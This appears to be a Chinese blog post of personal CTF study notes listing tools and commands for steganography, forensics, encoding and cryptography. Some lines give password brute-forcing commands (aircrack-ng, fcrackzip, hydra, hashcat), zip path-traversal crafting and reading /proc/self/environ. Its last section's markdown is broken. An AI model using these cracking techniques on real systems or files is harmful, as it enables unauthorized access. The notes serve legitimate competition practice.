<!doctype html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>






<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  

  
    

    
  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Microsoft YaHei:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.1" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="笔记," />








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.1" />






<meta name="description" content="CTF Web漏洞与渗透(Web)操作系统和网站应用服务器安全，网站多种语言源代码阅读分析（特别是php和java），数据库管理和SQL语句查询，Web漏洞挖掘和利用（SQL注入和XSS等），各种服务器提权，编写补丁并修复网站漏洞。  软件逆向 (Reverse Engineering)Windows / Linux / Android 在 x86 / x86_64 / ARM平台多种编程语言的熟">
<meta name="keywords" content="笔记">
<meta property="og:type" content="article">
<meta property="og:title" content="CTF学习笔记">
<meta property="og:url" content="http://yoursite.com/2018/02/14/CTF学习笔记/index.html">
<meta property="og:site_name" content="zgjx的博客">
<meta property="og:description" content="CTF Web漏洞与渗透(Web)操作系统和网站应用服务器安全，网站多种语言源代码阅读分析（特别是php和java），数据库管理和SQL语句查询，Web漏洞挖掘和利用（SQL注入和XSS等），各种服务器提权，编写补丁并修复网站漏洞。  软件逆向 (Reverse Engineering)Windows / Linux / Android 在 x86 / x86_64 / ARM平台多种编程语言的熟">
<meta property="og:updated_time" content="2018-09-21T01:59:48.074Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="CTF学习笔记">
<meta name="twitter:description" content="CTF Web漏洞与渗透(Web)操作系统和网站应用服务器安全，网站多种语言源代码阅读分析（特别是php和java），数据库管理和SQL语句查询，Web漏洞挖掘和利用（SQL注入和XSS等），各种服务器提权，编写补丁并修复网站漏洞。  软件逆向 (Reverse Engineering)Windows / Linux / Android 在 x86 / x86_64 / ARM平台多种编程语言的熟">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    sidebar: {"position":"left","display":"always","offset":12,"offset_float":0,"b2t":true,"scrollpercent":true},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2018/02/14/CTF学习笔记/"/>





  <title>CTF学习笔记 | zgjx的博客</title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  















  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">zgjx的博客</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">....-/.----/-..../...--/--.../...--/--.../....-/---../.----/----./....-/----./..---/----./...--/----./.----</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2018/02/14/CTF学习笔记/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="zgjx">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/user.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="zgjx的博客">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">CTF学习笔记</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-02-14T08:54:58+08:00">
                2018-02-14
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/笔记/" itemprop="url" rel="index">
                    <span itemprop="name">笔记</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="CTF"><a href="#CTF" class="headerlink" title="CTF"></a>CTF</h2><ol>
<li><p>Web漏洞与渗透(Web)<br>操作系统和网站应用服务器安全，<br>网站多种语言源代码阅读分析（特别是php和java），<br>数据库管理和SQL语句查询，<br>Web漏洞挖掘和利用（SQL注入和XSS等），<br>各种服务器提权，<br>编写补丁并修复网站漏洞。</p>
</li>
<li><p>软件逆向 (Reverse Engineering)<br>Windows / Linux / Android 在 x86 / x86_64 / ARM平台多种编程语言的熟练掌握，<br>对源代码及二进制文件的分析和理解，<br>对多种反编译乃至反汇编逆向工具和脱壳，调试技巧的熟练掌握，<br>Android移动应用APK文件的逆向分析，<br>掌握加解密，内核编程，算法，反调试和代码混淆技术。</p>
</li>
<li><p>漏洞挖掘和利用 (Exploit)<br>Windows / Linux 在 x86 / x86_64 平台的二进制程序漏洞挖掘<br>掌握C / C++ / Python / PHP / Java / Ruby / 汇编 等语言，<br>掌握缓冲区溢出和格式化字符串攻击，<br>编写shellcode进行利用。</p>
</li>
<li><p>密码学原理及应用 (Crypto)<br>掌握古典密码学和现代密码学，<br>分析密码算法和协议，<br>计算密钥和进行加解密操作。</p>
</li>
<li><p>安全杂项 (Misc)<br>信息搜集能力，<br>编程能力考察，<br>移动（Mobile）应用安全，<br>隐写术和信息隐藏，<br>计算机取证 (Forensics) 技术和文件恢复，<br>网络基础以及对网络流量的分析能力。</p>
</li>
</ol>
<p><a href="http://hebin.me/2017/09/01/%E8%A5%BF%E6%99%AE%E5%AE%9E%E9%AA%8C%E5%90%A7ctf%E8%A7%A3%E9%A2%98writeup%E5%A4%A7%E5%85%A8/" target="_blank" rel="external">西普实验吧CTF解题Writeup大全</a></p>
<h2 id="杂项"><a href="#杂项" class="headerlink" title="杂项"></a>杂项</h2><p><a href="https://github.com/JohnHammond/ctf-katana" target="_blank" rel="external">ctf-katana</a>ctf武器库</p>
<h4 id="常用"><a href="#常用" class="headerlink" title="常用"></a>常用</h4><p><code>RouterPassView</code>路由器密码查看器<br><a href="https://cli.im/deqr" target="_blank" rel="external">二维码扫描器</a>(<a href="http://jiema.wwei.cn/)(https://www.bejson.com/convert/qrcode/)(`QR_Research`),二维码修复参考`https://blog.csdn.net/zsj2102/article/details/75541856`(搜索" target="_blank" rel="external">http://jiema.wwei.cn/)(https://www.bejson.com/convert/qrcode/)(`QR_Research`),二维码修复参考`https://blog.csdn.net/zsj2102/article/details/75541856`(搜索</a> QRCode)<br><a href="https://online-barcode-reader.inliteresearch.com/" target="_blank" rel="external">条形码扫描器</a><br><code>aircrack-ng</code>:<code>aircrack-ng wifi.cap -w wordlist.txt</code>wifi-跑包,流量分析<br><code>airdecap-ng</code>解密cap报文<code>airdecap-ng.exe shipin.cap -e 0719 -p 88888888</code><br><a href="https://www.cnblogs.com/webFuckeeeer/archive/2015/05/28/4536776.html" target="_blank" rel="external">RGB转图片代码</a><br><a href="https://blog.csdn.net/qq_39629343/article/details/80611614" target="_blank" rel="external">CRC32碰撞代码</a>,(<a href="https://github.com/theonlypwner/crc32" target="_blank" rel="external">https://github.com/theonlypwner/crc32</a>)<br><code>010editor</code>16进制编辑器<br><code>winrar</code>压缩解压工具<br>md5碰撞<code>Goodbye World :-(</code>,<code>Hello World ;-)</code>(<a href="https://www.cnblogs.com/alexyuyu/articles/3508110.html" target="_blank" rel="external">https://www.cnblogs.com/alexyuyu/articles/3508110.html</a>)<br><code>Advanced Archive Password Recovery-ARCHPR</code>zip及rar密码爆破;<code>fcrackzip-linux</code>zip爆破(<code>fcrackzip -b -c 1 -u -v -l 1-5 00000000.zip</code>);<code>RAR Password Unlocker</code>及<code>RAR Password Cracker</code>rar爆破;<code>Ziperello</code>恢复zip压缩文件密码的工具;<code>Zip Repair</code>zip修复工具<br><a href="http://imgbase64.duoshitong.com/" target="_blank" rel="external">base64转图片</a><br><code>R-studio``Diskgenius</code>(文件恢复,img挂载)<br><a href="https://cloud.baidu.com/product/ocr/general" target="_blank" rel="external">百度文字识别</a><br><code>Beyond Compare``UltraCompare</code>文件对比工具<br><code>file</code>查看文件描述,<code>strings</code>查看字符串,<code>import filetype;print(filetype.guess(&#39;l.zip&#39;))</code>使用python猜测文件类型;windows:<code>trid</code><br><a href="http://www.dooccn.com/php/" target="_blank" rel="external">php代码在线运行</a><br><code>ping</code>用的协议是<code>icmp</code><br><code>合并文件</code>(<code>copy /B x* xx.png</code>或<code>type x* &gt;&gt;xx.png</code>)<br><a href="https://blog.csdn.net/mao0514/article/details/38864965" target="_blank" rel="external">文章-解析FAT16文件系统</a><br><code>XOR Assistant</code>XOR计算器,可选择文件<br><code>Access MDB 数据库密码查看器</code><br><code>HashTab</code>win文件属性添加文件<code>md5</code>、<code>sha1</code>、<code>CRC32</code>,也可进行文件对比<br><code>/proc/self/environ</code>读取环境变量<br><code>mathematica</code>数论工具<br><code>Potplayer</code>万能视频播放器<br><a href="https://github.com/Z3Prover/z3" target="_blank" rel="external">python-z3py</a>微软出品的开源约束求解器(<a href="http://www.freebuf.com/articles/database/170814.html" target="_blank" rel="external">http://www.freebuf.com/articles/database/170814.html</a>)<br><code>hash_extender或HashPump</code><a href="https://www.cnblogs.com/pcat/p/5478509.html" target="_blank" rel="external">MD5长度扩展攻击</a><br><a href="http://f00l.de/hacking/pcapfix.php" target="_blank" rel="external">cap包在线修复</a><br><code>advanced office password recovery</code>doc密码暴力破解<br>蜜罐系统-<code>kippo</code>,<code>dionaea</code><br><a href="http://www.colasoft.com.cn/products/capsa.php" target="_blank" rel="external">科来网络分析工具</a><br><code>volatility</code>内存取证<br><code>Elcomsoft Forensic Disk Decryptor(EFDD解密工具)</code>可实时解密BitLocker、PGP以及TrueCrypt加密磁盘<br><code>c语言编译</code>:<code>gcc test.c -o test</code><br><code>dd if=1 bs=1 of=1.1 skip=364</code>输入文件名1，输出文件名1.1，每次1字节，跳过前364字节<br><code>md5sum filename</code>计算文件的md5<br><a href="https://ihomura.cn/2018/08/03/WriteUp-ext3-文件恢复-HZ-file/" target="_blank" rel="external">ex3||ex4文件恢复</a><br><code>ffmpeg -i Marcode.mp4 -r 25 -f image2 frames/frame-%04d.png</code>提取视频每一帧为图片<br><a href="https://github.com/ptoomey3/evilarc" target="_blank" rel="external">evilarc</a>创建包含递归文件的zip，或使用指令<code>zip ../admin/key.txt</code><br><figure class="highlight sh"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="comment"># 文件挂载 # http://www.runoob.com/linux/linux-comm-mount.html</span></div><div class="line">mount -o loop d.img /mnt/minix</div></pre></td></tr></table></figure></p>
<h4 id="Wireshark"><a href="#Wireshark" class="headerlink" title="Wireshark"></a>Wireshark</h4><p><a href="https://blog.csdn.net/qq_29277155/article/category/6337571" target="_blank" rel="external">Wireshark系列教程</a><br><a href="https://legacy.gitbook.com/book/wizardforcel/wireshark-manual/details" target="_blank" rel="external">Wireshark 用户手册</a></p>
<ul>
<li>http.request.method == POST and http contains “admin”</li>
<li>ip.src eq 192.168.1.107 or ip.dst eq 192.168.1.107 and ip.addr == 192.168.1.107</li>
<li>tcp.port == 80 and udp.dstport == 80 or tcp.srcport &lt;= 10000</li>
<li>tcp|udp|arp|icmp|http|smtp|ftp|dns|msnms|ip|ssl|not oicq|!bootp</li>
<li>eth.dst == A0:00:00:04:C5:84 and eth.src eq A0:00:00:04:C5:84 or eth.addr eq A0:00:00:04:C5:84</li>
<li>http.request.method == “GET” or http.request.method == “POST”</li>
<li>http.request.uri == “/img/logo-edu.gif” or http.request.uri contains “/img/logo-edu.gif” or http contains “GET”</li>
</ul>
<h4 id="隐写术"><a href="#隐写术" class="headerlink" title="隐写术"></a>隐写术</h4><p><code>binwalk</code>分析二进制文件,<code>binwalk -e</code>分离文件<br><code>winhex</code>查看文件二进制(加载vmdk-专业工具&gt;将镜像文件转换为磁盘)<br><code>JPEG</code>文件头<code>FFD8FFE0 00104A46</code>,<code>JPEG</code>文件结尾为<code>FFD9</code>,<code>rar</code>的文件尾<code>C43D7B00 400700</code>,文件头<code>52617221 1A0700</code>即<code>Rar!</code>,ZIP文件头<code>504B0304 0A00</code>即<code>PK</code>,GIF开头<code>47494638 3961</code>即<code>GIF</code>,PNG文件头<code>89504E47 0D0A1A0A 0000000D 49</code>即<code>|PNG</code>,PNG文件结尾<code>49454E44 AE426082</code>即<code>IEND</code>bmp文件头<code>424D</code>即<code>BM</code>(<a href="https://blog.csdn.net/beiya123/article/details/70170616" target="_blank" rel="external">https://blog.csdn.net/beiya123/article/details/70170616</a>)<br><a href="http://www.cnblogs.com/qfcndtt/archive/2012/05/08/2489761.html" target="_blank" rel="external">各类文件头信息</a>(<a href="https://tool.lu/magicbytes/" target="_blank" rel="external">https://tool.lu/magicbytes/</a>)<br><code>Audacity</code>音频分析软件<br><a href="https://blog.csdn.net/ETF6996/article/details/51946250" target="_blank" rel="external">ZIP伪加密</a>(<code>50 4B 01 02 3F 00 14 00 00 00</code>),<a href="https://blog.csdn.net/pdsu161530247/article/details/73612910" target="_blank" rel="external">ZipCenOp.jar</a>-<code>java -jar ZipCenOp.jar r xxx.zip</code>检测伪加密<br><a href="http://www.atool.org/steganography.php" target="_blank" rel="external">steganography图片隐写术加密</a><br><code>foremost</code> 分离文件，有bug<br><code>steghide</code>隐藏文件 (steghide info 查看隐写信息;steghide extract -sf 隐藏文件 [-xf 输出文件 -p 密码])<br><a href="https://github.com/Va5c0/Steghide-Brute-Force-Tool" target="_blank" rel="external">steghide字典爆破</a><code>python steg_brute.py -b -d password.lst -f rabbithole.jpg</code><br><code>Stegolve</code>图片通道信息,合并,逐帧查看<br>png修改图片高度<br><code>gnuplot</code>可根据坐标绘图<br><code>gifsplitter</code>gif分离工具,<code>好压看图王</code>gif分离为jpg,<code>convert favicon.gif output.png</code>linux中将gif转为png<br><code>stegdetect</code>可以检测jpg通过<code>JSteg</code>、<code>JPHide</code>、<code>OutGuess</code>、<code>Invisible Secrets</code>、<code>F5</code>、<code>appendX</code>和<code>Camouflage</code>等这些隐写工具隐藏的信息.(<a href="http://old-releases.ubuntu.com/ubuntu/pool/universe/s/stegdetect/?C=M;O=A" target="_blank" rel="external">http://old-releases.ubuntu.com/ubuntu/pool/universe/s/stegdetect/?C=M;O=A</a>)<br>(<code>stegdetect 1.jpg -s 1000</code> -s 参数修改敏感度)<br>    -q 仅显示可能包含隐藏内容的图像。<br>    -n 启用检查JPEG文件头功能，以降低误报率。如果启用，所有带有批注区域的文件将被视为没有被嵌入信息。如果JPEG文件的JFIF标识符中的版本号不是1.1，则禁用OutGuess检测。<br>    -s 修改检测算法的敏感度，该值的默认值为1。检测结果的匹配度与检测算法的敏感度成正比，算法敏感度的值越大，检测出的可疑文件包含敏感信息的可能性越大。<br>    -d 打印带行号的调试信息。<br>    -t 设置要检测哪些隐写工具（默认检测jopi），可设置的选项如下：<br>        j 检测图像中的信息是否是用jsteg嵌入的。<br>        o 检测图像中的信息是否是用outguess嵌入的。<br>        p 检测图像中的信息是否是用jphide嵌入的。<br>        i 检测图像中的信息是否是用invisible secrets嵌入的。<br>    -V 显示软件版本号。</p>
<ul>
<li><a href="https://github.com/crorvick/outguess" target="_blank" rel="external">OutGuess-old</a>(<code>security/outguess/outguess -r 1.jpg 1.txt</code>)</li>
<li><a href="https://github.com/matthewgao/F5-steganography" target="_blank" rel="external">F5隐写</a>(<code>cd C:\\software\F5-steganography;java Extract 123456.jpg -p 123456</code>)(可能不用密码)</li>
<li><code>JPHide</code>(<code>Jphswin.exe</code>)(<a href="http://io.acad.athabascau.ca/~grizzlie/Comp607/programs.htm" target="_blank" rel="external">http://io.acad.athabascau.ca/~grizzlie/Comp607/programs.htm</a>)</li>
<li><a href="https://github.com/lukechampine/jsteg" target="_blank" rel="external">JSteg</a>(<code>jsteg-windows-amd64.exe reveal *.jpg</code>)</li>
<li><a href="https://sourceforge.net/projects/jstego/" target="_blank" rel="external">jstego</a><br>如果检测结果显示该文件可能包含隐藏信息，那么Stegdetect会在检测结果后面使用1～3颗星来标识<br>隐藏信息存在的可能性大小，3颗星表示隐藏信息存在的可能性最大。<br><code>Mp3隐写</code>(MP3Stego)(<code>C:\software\MP3Stego;Decode.exe -X apple.mp3 -P 9158753624</code>)<br><code>Doc隐写</code>(打印-选项-显示隐藏文字)(字体-隐藏)<br><a href="https://sourceforge.net/projects/image-steg/files/" target="_blank" rel="external">Image Steganography下载</a>(勾选decode和decrypt)<br><a href="http://tu.sioe.cn/gj/fenjie/" target="_blank" rel="external">GIF在线分解</a>(Stegolve)<br><code>png分析工具</code>(tweakpng-windows)(pngcheck-linux)<code>pngcheck -v t.png</code><br><a href="http://dialabc.com/sound/detect/index.html" target="_blank" rel="external">电话音在线识别 - 双音多频DTMF</a><br><a href="http://wbstego.wbailer.com/" target="_blank" rel="external">wbStego-LSB最低有效位(Least Significant Bit)</a>-wbStego4.3open.exe-<code>bmp、exe、pdf、xml、asc</code><br><code>compare start.png to.png out.png</code>比较文件<br><code>ntfsstreamseditor</code>NTFS分区数据流检测工具<br><a href="https://github.com/livz/cloacked-pixel" target="_blank" rel="external">png-LSB隐写</a>,<code>python lsb.py extract X-man-Keyword.png 1.txt lovekfc</code>(需要密码如lovekfc)<br><code>bmp高度隐写</code>(<a href="https://blog.csdn.net/xuchen16/article/details/80855327)-2,bmp高度正为倒向位图" target="_blank" rel="external">https://blog.csdn.net/xuchen16/article/details/80855327)-2,bmp高度正为倒向位图</a> 高度为负为正向位图<br><code>png/bmp lsb隐写</code><a href="https://github.com/zed-0xff/zsteg" target="_blank" rel="external">zsteg</a>,<code>zsteg nvshen.jpg</code>(无结果可尝试加上参数<code>-a</code>)<br><a href="http://www.softpedia.com/get/Security/Encrypting/DeEgger-Embedder.shtml" target="_blank" rel="external">DeEgger Embedder</a><code>AVI, JPG, PNG, MP3</code>等隐写工具(文件会明显增大，无法使用密码)<br><a href="https://github.com/chishaxie/BlindWaterMark" target="_blank" rel="external">盲水印</a>要有原图<code>python bwm.py decode hui.png hui_with_wm.png wm_from_hui.png</code><br><a href="https://github.com/linyacool/blind-watermark" target="_blank" rel="external">盲水印2</a><code>python decode.py --original &lt;original image file&gt; --image &lt;image file&gt; --result &lt;result file&gt;</code><br><a href="https://silenteye.v1kings.io/" target="_blank" rel="external">SilentEye</a>隐写到图片或音视频<br>BMP位移OFFSET<br><a href="https://introspelliam.github.io/2017/11/12/misc/CTF比赛中关于zip的总结/" target="_blank" rel="external">CTF比赛中关于zip的总结</a><br><a href="http://domnit.org/stepic/doc/" target="_blank" rel="external">stepic</a>python-png隐写工具,<code>stepic -d -i pow.png &gt; pow.jpg</code>png转jpg<br><code>Picture Doctor</code>图片修复工具;<code>pixrecovery</code>图片修复工具(暂无破解版,<code>https://online.officerecovery.com/pixrecovery/</code>)(<code>https://online.officerecovery.com/cn/fix-damaged-photo-file-online/</code>)<br><a href="http://www.greenxf.com/soft/55879.html" target="_blank" rel="external">Comfy File Repair</a>文件修复工具<br><a href="https://www.anquanke.com/post/id/86793" target="_blank" rel="external">PCRT：一款自动化检测修复PNG损坏的取证工具</a><br><a href="https://bitbucket.org/jherron/stegosaurus/src" target="_blank" rel="external">pyc字节码隐写</a><code>python3 stegosaurus.py -x QAQ.pyc</code><br><code>pdfcrack</code>pdf密码爆破</li>
</ul>
<h2 id="加密"><a href="#加密" class="headerlink" title="加密"></a>加密</h2><h4 id="文章-工具"><a href="#文章-工具" class="headerlink" title="文章/工具"></a>文章/工具</h4><p><a href="http://blog.csdn.net/youzen_ing/article/details/73075180" target="_blank" rel="external">网站合集-一些在线解密网站</a><br><a href="https://www.cnblogs.com/mq0036/p/6544055.html" target="_blank" rel="external">文章-CTF中那些脑洞大开的编码和加密</a><br><a href="https://www.cnblogs.com/gwind/p/7997922.html" target="_blank" rel="external">文章-CTF中编码与加解密总结</a><br><a href="https://introspelliam.github.io/2018/03/26/crypto/常用于密码学中的算法/" target="_blank" rel="external">常用于密码学中的算法</a><br><a href="http://skysec.top/2017/12/13/padding-oracle和cbc翻转攻击/" target="_blank" rel="external">padding-oracle和cbc翻转攻击</a><br><a href="https://github.com/OAlienO/CTF/blob/master/2018/noxCTF/Plot-Twist/solve.py" target="_blank" rel="external">python random预测</a></p>
<p><a href="https://www.ctftools.com/down/" target="_blank" rel="external">工具合集-CTFtools大量工具合集</a><br><a href="https://www.bejson.com/" target="_blank" rel="external">编码/加密/Json/给中转换/二维码/文字识别等大量工具</a><br><a href="https://c.runoob.com/" target="_blank" rel="external">编译/前端</a><br><a href="http://www.cnblogs.com/gwind/p/8030190.html" target="_blank" rel="external">CTF常用在线工具总结</a><br><a href="http://encode.chahuo.com/" target="_blank" rel="external">SHA/MD5/Hmac/url/aes/des/rabbit/RC4/tripledes/base64</a><br><a href="https://tool.lu/" target="_blank" rel="external">开发/站长/极客/其他/HR工具</a><br><a href="https://github.com/koczkatamas/koczkatamas.github.io" target="_blank" rel="external">kt.gy</a>各种编码转换工具<br><a href="http://ctf.ssleye.com/" target="_blank" rel="external">ctf在线工具合集-加密、编码</a><br><a href="https://www.pw88.com/soft/87827.html#download" target="_blank" rel="external">converter</a><br><a href="https://web2hack.org/xssee/" target="_blank" rel="external">xssee编码这换</a><br><a href="https://github.com/mbikovitsky/BrainTools" target="_blank" rel="external">Braintools/bftools</a><code>bftools.exe decode braincopter(或者brainloller) doge.png --output out.png &amp;&amp; bftools.exe run out.png</code><br><a href="https://github.com/gchq/CyberChef" target="_blank" rel="external">CyberChef</a>(英国情报机构政府通信总部(GCHQ)官方离线解密解码html工具)<br><a href="http://tool.bugku.com/" target="_blank" rel="external">bugku在线工具箱</a><br><a href="http://www.bm8.com.cn/Indez.htm" target="_blank" rel="external">站长/加密解密/前端js解密</a></p>
<p><code>crx-XSS Encode</code>(前端各种编码/解码)<br><code>CTFCrackTools</code>(凯撒/维吉尼亚/倒序/猪圈/栅栏/字符转16进制/base64/32/摩斯/培根/url/unicode,可加载自定义Python脚本)<br><code>西西万能编码转换器</code>(URL/UTF8/ASCII/MD5/字符转16进制/base6/域名转IP/简繁体/BIG5)<br><code>系统自带计算器</code>(进制转换/科学计算/日期计算/货币体积重量等各种转换器)<br><code>hydra</code>各种系统服务暴力破解<br><code>hashcat</code>各种密码离线暴力破解<br><code>JPocketKnife</code>(进制转换,bin-ascii)<br><code>飘云阁密码学综合工具</code><br><code>小葵多功能转换工具</code>(url/sql/hex/ascii/base64/md5)<br><code>pwgen</code>创建随机密码<code>xeger</code>根据正则表达式反向随机生成满足表达式格式的字符串<code>Cupp</code>社工密码字典生成工具<code>Cewl</code>通过爬取网站的时候，根据爬取内容的关键字生成一份字典</p>
<h4 id="常见加密"><a href="#常见加密" class="headerlink" title="常见加密"></a>常见加密</h4><p><a href="http://www.zhongguosou.com/zonghe/moErSiCodeConverter.aspx" target="_blank" rel="external">摩斯密码</a><br><a href="http://www.qqxiuzi.cn/bianma/zhalanmima.php" target="_blank" rel="external">栅栏密码</a>,(CTFCrackTools-FenceCode)<br><a href="http://planetcalc.com/1434/" target="_blank" rel="external">凯撒密码</a>,(<a href="http://www.zjslove.com/3.decode/kaisa/index.html" target="_blank" rel="external">http://www.zjslove.com/3.decode/kaisa/index.html</a>)<br><a href="http://tool.bugku.com/jiemi/" target="_blank" rel="external">维吉尼亚密码Vigenère cipher</a>,(<a href="https://www.guballa.de/vigenere-solver" target="_blank" rel="external">https://www.guballa.de/vigenere-solver</a>)<br><a href="http://www.zjslove.com/3.decode/" target="_blank" rel="external">当铺密码/倒序密码</a>-[凯撒密码、维吉尼亚、当铺密码、倒序密码]<br>电脑键盘/手机键盘加密<br><code>brainfuck</code>(<a href="http://esoteric.sange.fi/brainfuck/impl/interp/i.html)(http://copy.sh/brainfuck/)(https://www.splitbrain.org/services/ook)(https://www.nayuki.io/page/brainfuck-interpreter-javascript)（又被称为brainf**k或者BF，brainfuck语言用`" target="_blank" rel="external">http://esoteric.sange.fi/brainfuck/impl/interp/i.html)(http://copy.sh/brainfuck/)(https://www.splitbrain.org/services/ook)(https://www.nayuki.io/page/brainfuck-interpreter-javascript)（又被称为brainf**k或者BF，brainfuck语言用`</a>&lt;&gt;+-.,[]<code>八种符号来替换C语言的各种语法和命令。Ook！语言与brainfuck类似。或使用.!?三种符号。）</code>猪圈密码<code>-(CTFCrackTools-Pigcode)(http://ctf.ssleye.com/pigpen.html)
[Rabbit加密](https://www.sojson.com/encrypt_rabbit.html)</code>z85<code>(Js库)
[培根密码(1)加解密](http://tool.bugku.com/peigen/)(https://netair.xyz/tools/培根密码加密解密.html)培根密码(CTFCrackTools-不同与在线) --仅字母A和B;培根密码(2)</code>A-M=&gt;a,N-Z=&gt;b<code>(https://baike.baidu.com/item/培根密码/2134182?fr=aladdin)
[AES/DES/RC4/Rabbit/TripleDes加密/解密](https://www.sojson.com/encrypt.html)(http://tool.chacuo.net/cryptaes)(http://aes.online-domain-tools.com/)(http://encode.chahuo.com/)(http://e-file.arkoo.com/tools/des3.htm)(http://tool.oschina.net/encrypt)(http://tools.jb51.net/password/des_encode)(http://tool.chinaz.com/Tools/textencrypt.aspx)(http://www.seacha.com/tools/aes.html?src=U2FsdGVkX182eA%2F8U%2F2KZS481hY9lDS37kNjZ1UZtCckgQoGA7lo%2FDtcv78qFew6LuMTMoP2mEapD0YIBh2Waw%3D%3D&amp;mode=CBC&amp;keylen=128&amp;key=iFurySt&amp;iv=&amp;bpkcs=&amp;session=nwsdOeV7LRvXDMbQF7lq&amp;aes=ff97b7ab6427f742649ba3eddf05386b&amp;encoding=base64&amp;type=1)(http://tool.sufeinet.com/Encrypt/DesEncrypt.aspx)(http://www.kjson.com/encrypt/des/)</code>Python代码<code>(https://www.cnblogs.com/huangjianting/p/8666446.html)</code>aeskeyfind-linux<code>寻找文件中的AES密码
[与佛论禅](http://www.keyfc.net/bbs/tools/tudoucode.aspx)与佛论禅  --中文乱码
[MD5解密](http://www.cmd5.com/)(https://somd5.com/)(https://www.md5online.org/)(http://www.chamd5.org/)(http://hashcrack.com/index.php)(http://www.xmd5.org/)(http://pmd5.com/)(http://www.wmd5.com/)[本地md5解密](http://www.atool.org/md5-crack.php)(</code>hashcat<code>)
[Unicode/UTF8编码转换](http://tool.chinaz.com/tools/unicode.aspx)
[字符转16进制](https://www.bejson.com/convert/ox2str/)</code>托马斯杰弗逊转轮加密<code>(https://blog.csdn.net/pdsu161530247/article/details/73604729)</code>ADFGVX加密<code>(http://hebin.me/2017/09/08/%e8%a5%bf%e6%99%aectf-%e7%b4%a7%e6%80%a5%e6%8a%a5%e6%96%87/)</code>XOR Assistant<code>异或计算
AES加密候选算法</code>Rijndael<code>、</code>Serpent<code>、</code>Twofish<code>、</code>MARS<code>和</code>RC6<code>[AES/DES/RC4/serpent加密](http://serpent.online-domain-tools.com/)
